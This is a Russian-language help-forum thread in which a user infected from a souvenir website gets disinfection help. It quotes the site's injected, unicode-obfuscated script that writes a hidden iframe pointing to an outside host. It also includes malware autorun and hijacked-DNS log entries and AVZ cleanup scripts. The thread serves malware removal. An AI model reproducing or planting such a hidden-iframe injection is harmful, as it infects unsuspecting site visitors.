-
Junior Member
- Вес репутации
- 61
Поймал трояна с сайта
На совершенно мирном сувенирном сайте kaleidoscope поймал за хвост трояна:
</body>
</html>
<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068 \u0074\u0074\u0070\u003a\u002f\u002f\u0063\u006f\u 0075\u006e\u0074\u0065\u0072\u006d\u0065\u0064\u00 69\u0061\u0067\u0072\u006f\u0075\u0070\u002e\u0063 \u006f\u006d\u002f\u0074\u0073\u002f\u0069\u006e\u 002e\u0063\u0067\u0069\u003f\u0079\u0061\u0068\u00 6f\u006f\u0022\u0020\u0077\u0069\u0064\u0074\u0068 \u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u 0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u00 65\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069 \u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u 0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u00 74\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f \u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u 0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>
А теперь никак не вычищу.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Отключите антивирус и интернет!
Пофиксить
Код:
O4 - HKLM\..\Run: [runwinlogon] C:\WINDOWS\winlogon.exe
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spools.exe
O4 - HKLM\..\Run: [autoload] C:\Documents and Settings\Ekimenkov\cftmon.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spools.exe
O4 - HKCU\..\Run: [autoload] C:\Documents and Settings\Ekimenkov\cftmon.exe
O4 - HKUS\S-1-5-18\..\Run: [herjek] C:\WINDOWS\herjek.exe (User 'SYSTEM')
O16 - DPF: {BD11A280-2E73-11CF-B6CF-00AA00A74DAE} - file://C:\Info_sex4.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{345FC773-F6EF-49FE-90EC-F107DC0BFF16}: NameServer = 85.255.115.60,85.255.112.106
O17 - HKLM\System\CCS\Services\Tcpip\..\{5F9689F3-E406-4B7B-AAF1-FC4D14AF8982}: NameServer = 85.255.115.60,85.255.112.106
O17 - HKLM\System\CCS\Services\Tcpip\..\{62D3B7E4-334B-4070-B638-1FBF021DAFAD}: NameServer = 85.255.115.60,85.255.112.106
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: NameServer = 85.255.115.60 85.255.112.106
O17 - HKLM\System\CS2\Services\Tcpip\..\{345FC773-F6EF-49FE-90EC-F107DC0BFF16}: NameServer = 85.255.115.60,85.255.112.106
O17 - HKLM\System\CS3\Services\Tcpip\Parameters: NameServer = 85.255.115.60 85.255.112.106
O17 - HKLM\System\CS3\Services\Tcpip\..\{345FC773-F6EF-49FE-90EC-F107DC0BFF16}: NameServer = 85.255.115.60,85.255.112.106
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 85.255.115.60 85.255.112.106
AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".
Код:
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('kdeed.exe','');
QuarantineFile('C:\WINDOWS\winlogon.exe','');
QuarantineFile('C:\WINDOWS\herjek.exe','');
QuarantineFile('C:\Documents and Settings\LocalService\cftmon.exe','');
QuarantineFile('C:\Documents and Settings\Ekimenkov\cftmon.exe','');
QuarantineFile('C:\Documents and Settings\Ekimenkov\ie_updates3r.exe','');
QuarantineFile('c:\windows\system32\drivers\spools.exe','');
TerminateProcessByName('c:\windows\system32\drivers\spools.exe');
DeleteService('Bgib46');
DeleteService('Schedule');
DeleteService('Google Online Services');
DeleteFile('C:\WINDOWS\system32\kdeed.exe');
DeleteFile('c:\windows\system32\drivers\spools.exe');
DeleteFile('C:\Documents and Settings\Ekimenkov\ie_updates3r.exe');
DeleteFile('C:\Documents and Settings\Ekimenkov\cftmon.exe');
DeleteFile('C:\Documents and Settings\LocalService\cftmon.exe');
DeleteFile('C:\WINDOWS\herjek.exe');
DeleteFile('C:\WINDOWS\winlogon.exe');
DeleteFile('kdeed.exe');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
ExecuteRepair(1 );
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.
Прислать карантин согласно приложения 3 правил .
Загружать по ссылке:http://virusinfo.info/upload_virus.php?tid=23176
AVZ => Файл => Мастер поиска и устранения проблем. Категория проблемы - поставьте "Системные проблемы", степень опасности - "Все проблемы". Нажмите "Пуск". Всё найденное следует пометить и пофиксить. Данную операцию повторить для категории "Настройки и твики браузера".
Это лакомый кусочек для зверей:
Код:
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Нужно срочно обновить систему,иначе вы у нас надолго.
Повторите логи.
-
-
Junior Member
- Вес репутации
- 61
Да уж, вот это куча...
Все пофиксил-поскриптил.
Карантин выслал.
Логи повторил.
Но DrWEB всё равно определяет наличие Trojan.MulDrop.15170 и Downloader.60042
Сообщение от
Гриша
Это лакомый кусочек для зверей:
Код:
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Нужно срочно обновить систему, иначе вы у нас надолго.
А до какой степени посоветуете обновить? До SP3?
Последний раз редактировалось Ивпал; 08.06.2010 в 12:45.
-
Доктора отключить!
AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".
Код:
begin
ClearQuarantine;
SearchRootkit(true, true);
SetAVZGuardStatus(True);
DeleteService('Bgib46');
DeleteService('Google Online Services');
DeleteService('Schedule');
DeleteFile('C:\WINDOWS\system32\drivers\spools.exe');
DeleteFile('C:\Documents and Settings\Ekimenkov\ie_updates3r.exe');
BC_ImportDeletedList;
ExecuteSysClean;
BC_DeleteSvc('Bgib46 ');
BC_DeleteSvc('Google Online Services ');
BC_DeleteSvc('Schedule ');
BC_Activate;
RebootWindows(true);
end.
Обновите базы AVZ и повторите все логи.Обновиться лучше до SP3
-
-
Junior Member
- Вес репутации
- 61
Скрипт выполнил.
При получении логов AVZ выловил еще Trojan-Spy.Webmoner
Возможно, это связано с тем, что перед этим я по Вашему совету обновил базы AVZ.
Логи прилагаю.
Последний раз редактировалось Ивпал; 08.06.2010 в 12:45.
-
Хорошо прижились даже уходить не хотят
Скачайте,меню,File,появится аналог проводника,найти:
Код:
C:\WINDOWS\system32\drivers\spools.exe
C:\Documents and Settings\Ekimenkov\ie_updates3r.exe
Правая кнопка мыши Force Delete на запрос о перезагрузке ответьте положительно.
Затем скрипт из поста №4 http://virusinfo.info/showpost.php?p=229826&postcount=4
-
-
Junior Member
- Вес репутации
- 61
Похоже, мы его всё-таки выдавили
И Айс уже не понадобился (в том смысле, что он уже не нашел следов ie_updates3r.exe). Вероятно, это я пристегнул какие-то старые логи.
Спасибо!
-
-